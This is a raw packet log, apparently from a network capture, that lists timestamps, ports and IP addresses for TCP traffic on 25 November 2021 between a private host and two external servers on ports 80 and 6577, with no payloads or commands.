Nov 25, 2021 11:28:25.792265892 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.792295933 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.792356968 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.792417049 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.792479992 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.792483091 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.792534113 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.792541981 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.792551041 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.792604923 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.792665958 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.792673111 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.792723894 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.792727947 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.792738914 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.792752028 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.792792082 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.792795897 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.792855024 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.792915106 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.792975903 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.793015003 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.793037891 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.793066025 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.793081999 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.793102026 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.793164968 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.793200970 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.793226957 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.793289900 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.793349981 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.793366909 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.793411970 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.793437004 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.793451071 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.793462038 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.793472052 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.793482065 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.793489933 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.793544054 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.793596029 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.793648958 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.793701887 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.793731928 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.793755054 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.793778896 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.793792963 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.793803930 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.793812037 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.793814898 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.793826103 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.793865919 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.793867111 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.793920994 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.793973923 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.794027090 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.794080019 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.794086933 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.794132948 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.794135094 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.794188976 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.794240952 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.794260979 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.794295073 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.794337034 CET	80	49810	103.167.84.150	192.168.11.20
Nov 25, 2021 11:28:25.794440985 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.794487000 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.794501066 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.794511080 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.794521093 CET	49810	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:25.819139004 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.819243908 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.819272041 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.819329023 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.819381952 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.819506884 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.819566965 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.819633007 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.819891930 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.820059061 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.871985912 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.872052908 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.872095108 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.872136116 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.872178078 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.872222900 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.872383118 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.872544050 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.925468922 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.925519943 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.925554037 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.925585985 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.925616980 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.925647974 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.925679922 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.925712109 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.925750971 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.925908089 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.925947905 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.977950096 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.978024960 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.978079081 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.978132963 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.978147984 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.978251934 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.978307009 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.978365898 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.978425980 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:25.978478909 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:25.978646994 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:26.032718897 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:26.032799959 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:26.032835007 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:26.032866955 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:26.032917976 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:26.032927036 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:26.032968044 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:26.033011913 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:26.033101082 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:26.033262014 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:26.033428907 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:26.096429110 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:26.096446991 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:26.096601009 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:26.098241091 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:26.098359108 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:26.098634958 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:26.098764896 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:26.098778963 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:26.098849058 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:26.098893881 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:26.098907948 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:26.149593115 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:26.149854898 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:26.378840923 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:26.424679995 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:26.643469095 CET	49805	80	192.168.11.20	103.167.84.150
Nov 25, 2021 11:28:27.274494886 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.274677038 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.274703026 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.274808884 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.327310085 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.327352047 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.327487946 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.327538013 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.327568054 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.327590942 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.327755928 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.327938080 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.328165054 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.328337908 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.379548073 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.379595041 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.379857063 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.379882097 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.379965067 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.380001068 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.380021095 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.380199909 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.380357981 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.427907944 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.428138971 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.432534933 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.432585001 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.432640076 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.432672024 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.432706118 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.432869911 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.472701073 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.472929955 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.485232115 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.485279083 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.485311985 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.485460997 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.485589981 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.517347097 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.517610073 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.526989937 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.527221918 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.541141033 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.541210890 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.541244030 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.541462898 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.574146032 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.574492931 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.581644058 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.582032919 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.593337059 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.593393087 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.593430996 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.593517065 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.593676090 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.629250050 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.629488945 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.633435965 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.633797884 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.645292997 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.645509005 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.645741940 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.645787954 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.645941019 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.645951986 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.646111012 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.646286964 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.683209896 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.683485985 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.683605909 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.685518980 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.685834885 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.697962999 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.698008060 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.698041916 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.698072910 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.698105097 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.698167086 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.698474884 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.698596001 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.735551119 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.735752106 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.736638069 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.736861944 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.755489111 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.755536079 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.755568027 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.755676031 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.755846024 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:27.756825924 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.787241936 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.787617922 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.810885906 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.810935020 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.810967922 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:27.861745119 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.032896042 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.080447912 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.181082964 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.181185961 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.181236029 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.181287050 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.181359053 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.181533098 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.233973026 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.234018087 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.234050989 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.234081984 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.234112024 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.234143019 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.234160900 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.234219074 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.234256029 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.234334946 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.234436989 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.234472036 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.234502077 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.234509945 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.234668970 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.234839916 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.298479080 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.298783064 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.298984051 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.299036980 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.299092054 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.299124002 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.299154997 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.299185991 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.299216032 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.299246073 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.299405098 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.299438953 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.299521923 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.299686909 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.299719095 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.300497055 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.327748060 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.327994108 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.351383924 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.351464033 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.351497889 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.351532936 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.351578951 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.351608992 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.351644039 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.351805925 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.351974964 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.380141973 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.380455971 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.413254023 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.413305998 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.413338900 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.413371086 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.413400888 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.413573027 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.413685083 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.431921005 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.432163954 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.465814114 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.465883970 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.465919018 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.465950012 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.465980053 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.466012955 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.466170073 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.466336012 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.483488083 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.483768940 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.518241882 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.518306971 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.518337011 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.518374920 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.518618107 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.518749952 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.534825087 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.535018921 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.576919079 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.577263117 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.577378988 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.580471992 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.580530882 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.580569983 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.580607891 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.580790043 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.580895901 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.586961031 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.587299109 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.630033970 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.630094051 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.630407095 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.630525112 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.634224892 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.634283066 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.634321928 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.634358883 CET	6577	49806	193.104.197.85	192.168.11.20
Nov 25, 2021 11:28:28.634428024 CET	49806	6577	192.168.11.20	193.104.197.85
Nov 25, 2021 11:28:28.634582996 CET	49806	6577	192.168.11.20	193.104.197.85
